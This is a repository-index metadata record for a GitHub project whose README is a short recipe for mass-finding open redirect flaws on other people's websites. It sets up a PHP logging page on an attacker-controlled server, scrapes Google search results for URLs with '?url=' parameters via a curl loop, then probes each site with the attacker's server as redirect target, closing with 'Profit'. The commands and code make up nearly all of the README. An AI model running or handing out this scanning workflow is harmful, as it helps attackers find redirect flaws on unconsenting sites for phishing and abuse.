{"id":21307220,"url":"https://github.com/dotnetrussell/open-redirect-auto-scraper","last_synced_at":"2026-02-22T13:39:18.955Z","repository":{"id":116077340,"uuid":"205149757","full_name":"DotNetRussell/Open-Redirect-Auto-Scraper","owner":"DotNetRussell","description":null,"archived":false,"fork":false,"pushed_at":"2019-08-29T11:40:31.000Z","size":1,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"master","last_synced_at":"2025-10-23T23:40:32.395Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/DotNetRussell.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2019-08-29T11:38:01.000Z","updated_at":"2019-08-29T11:40:33.000Z","dependencies_parsed_at":null,"dependency_job_id":"b49cc3a3-4fc2-4ef6-867a-d8ffea26ce8f","html_url":"https://github.com/DotNetRussell/Open-Redirect-Auto-Scraper","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/DotNetRussell/Open-Redirect-Auto-Scraper","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/DotNetRussell%2FOpen-Redirect-Auto-Scraper","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/DotNetRussell%2FOpen-Redirect-Auto-Scraper/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/DotNetRussell%2FOpen-Redirect-Auto-Scraper/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/DotNetRussell%2FOpen-Redirect-Auto-Scraper/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/DotNetRussell","download_url":"https://codeload.github.com/DotNetRussell/Open-Redirect-Auto-Scraper/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/DotNetRussell%2FOpen-Redirect-Auto-Scraper/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29714579,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-02-22T13:30:57.152Z","status":"ssl_error","status_checked_at":"2026-02-22T13:30:28.561Z","response_time":110,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-21T16:30:36.290Z","updated_at":"2026-02-22T13:39:18.927Z","avatar_url":"https://github.com/DotNetRussell.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"Step 1: \nOn a public web server, create a php file that \ngrabs the caller get variable out of the url \nand saves it to a file \n\n```\n\u003c?php\n    $caller = $_GET['caller'].\"\\n\";\n\n    $fp = fopen('opr.txt','a');\n    fwrite($fp,$caller);\n?\u003e\n```\n\nStep 2: \nOn your attacking machine, run this search to get google dorks for /?url=\n\n`for (( x = 1; x \u003c 100; x++)); do a=$((x*10)); curl --connect-timeout 5 -A \"Mozilla/4.0\" -skLm 10 'https://www.google.com/search?start='\"$a\"'\u0026tbs=li:1\u0026q=inurl%3A%2F%3Furl%3Dhttp' | grep -o -P \"\\/url\\?q=.+?\u0026amp\" | grep -o -P \".*(?\u003c=url=)|.*(?\u003c=%3Furl%3D)\" | cut -d \"=\" -f2; sleep 5 \u003e\u003e targets ; done`\n\nStep 3:\nReplace the URL encodings\n\n`sed -e 's/%3F/?/g' -e 's/%3D/=/g' targets \u003e decoded`\n\nStep 4: \nOn your attacking machine, attempt to call your target list \n\n`for target in $(cat decoded); do curl --HEAD --max-redirs 3 --connect-timeout 2 -L --ignore $target\"https://yourwebserver.com/openredirectchecker.php?caller=$target\\n\" ;done`\n\nStep 5:\nOn your web server tail your output file\n\n`tail -f opr.txt`\n\nStep 6:\n\nProfit :-)\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdotnetrussell%2Fopen-redirect-auto-scraper","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fdotnetrussell%2Fopen-redirect-auto-scraper","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdotnetrussell%2Fopen-redirect-auto-scraper/lists"}